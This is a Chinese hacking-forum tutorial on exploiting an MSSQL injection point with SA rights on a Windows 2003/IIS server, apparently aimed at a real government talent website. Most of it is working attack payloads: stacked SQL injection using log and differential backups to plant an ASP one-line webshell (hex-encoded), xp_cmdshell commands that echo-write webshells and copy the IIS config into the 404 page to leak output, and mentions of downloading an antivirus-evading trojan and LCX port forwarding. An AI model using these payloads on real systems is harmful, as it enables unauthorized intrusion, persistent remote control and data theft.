sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
( s# k% M* }5 R# o, [* u, f

3 n$ x; N4 \- K8 P; |7 u0 H: L                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
4 q* L  I9 ]5 y: o1 E7 P
                                                                 
! ~7 f1 W. d0 F* N                                                                 
% ~3 x0 u$ S  c8 z) f( J: E1 E" v                                                                  论坛： http://www.90team.net/



( Z# q5 p' l6 a+ {% n$ d友情检测国家人才网
; f- J; e* J$ L# m4 q5 B# l

内容：MSSQL注入SA权限不显错模式下的入侵
5 b- Z! f( v9 `9 g" U& U* ~- b4 r1 \

一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。
9 {, l6 A% j  Y
* x7 b$ }2 }' n7 s, ~我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
6 _% v- m0 c: M

这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。

5 S, @1 t6 S  t. c8 y+ F& k思路：

首先：
+ M. P+ r) l1 Q. \! ~) Y
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
! R+ L& n. V( M0 P! U& ?. V, o
' p- [& J0 m. a1.日志备份获得Webshell

- z# M8 |+ @3 t( O2.数据库差异备份获得Webshell
3 j) U  X! e4 c5 o5 b
5 [2 Y* W4 k  \/ X0 _6 C( ~* u4.直接下载免杀远控木马。
! K2 f. W5 A% n' }, d- M* |# X
5.直接下载LCX将服务器端口转发出来

1 V0 z. }$ D- I! |8 ~" [5 z+ n! w6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。

& w% I; [( y0 x0 c6 r2 b4 I

" @' |0 x- o. S" ~  P9 u在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，

我直接演示后面一个方法
! `* h" q+ C+ N

分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
8 B. b8 w; D6 n* {1 P  v+ b1 E1 f. S; r
) N. v; j3 ]. z+ v

3 B0 H) N+ b  M; S. a8 g
◆日志备份：


& `' O8 V0 Q7 y; a1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
' w6 K. J8 S+ h, o; ^
0 L( c" u+ I0 D2 P# X2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
9 |* I3 o% N' t& I, h0 K! |) \
# @: s- q" i$ x+ ^0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
- i+ M# ^# _7 T' V3. 备份并获得文件，删除临时表
" F( n; ^& Y3 Y;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--


3 M$ m9 @+ \7 f9 P
- s$ \: U: d5 r( S( r* ?+ x2 w◆数据库差异备份
1 h$ Z! v/ [: U" V
: \6 X0 o0 i" K! b% F（1. 进行差异备份准备工作
' `2 b4 ^  a+ Q1 J/ y7 N: j# ]$ n
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
8 s  @4 O3 H- ?+ V6 ]
4 {4 g  U% [  a9 N9 f. _4 g  V上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码


（2. 将数据写入到数据库
3 [8 d0 Y  l! b! ^% @;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
7 U5 i6 c% z* a) f# p, Z, }
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
) ?3 L! K- e5 X3 n# X* Z1 [
  _& r& d8 V  Y% m) a! y/ P3. 备份数据库并清理临时文件

. W/ h( a  o/ O# f;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

7 G" Y% C8 ~& b  k* z0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
, B$ a+ H! B2 |2 z" ?/ X) Z: D
, M: }+ i* }& t  ?1 p8 }6 G: ?

; z" A0 X# y: T- Y) a+ A用^转义字符来写ASP(一句话木马)文件的方法:   
# z+ b1 U" G  u  x$ p, y, M
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
7 ]+ h7 B' f# n+ J. V: }
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
7 n  [2 s6 v. e9 k
读取IIS配置信息获取web路径
1 }5 t6 j# L2 D9 b" Y
9 ]1 j) b! z. p) W     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

3 Z( z6 ]' c/ F' V执行命令
     
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--





, ]! D  V( P, `, r/ }- M( t





! @1 R7 O2 f/ D, D0 C6 W% ^1 ]: Z


, P. k' |% \" o1 l
; g* J: g3 L  |& r  J
. d8 U+ x  n( j, o1 [

( n( Q8 c( [% Q; H6 ^
" J( X9 a. `5 }" t$ U2 C- v% I

6 |5 K  A, n, r9 X) K' q

! ~1 w. U3 m$ I/ N+ {

- x  _; X0 i9 S: r" s

, N2 H5 o9 x- U. S7 }( a5 n9 R) A& x
3 b& q4 @$ z% m  d  H2 J+ \
( t) r# O1 m; J1 O$ Q1 E; l1 E
& L# L9 g. r1 ^3 K3 v+ M4 m+ F
1 d- C) `* k0 s& V6 t: l

9 j- Y' a: C; ~2 e9 D5 }& k

: U5 N9 B  w' z# @+ x: ^* L
. w; t1 e, }. q6 j& q

  l6 W) h6 E% A" P) o1 L
: w3 k+ |+ \* }# a7 B" Y; y; w
' M7 W% N2 j& {* Z



; W- n% `. \  e( @" [* U& j


$ \% }/ C# c9 p( Z! B! r2 c) ~% P' A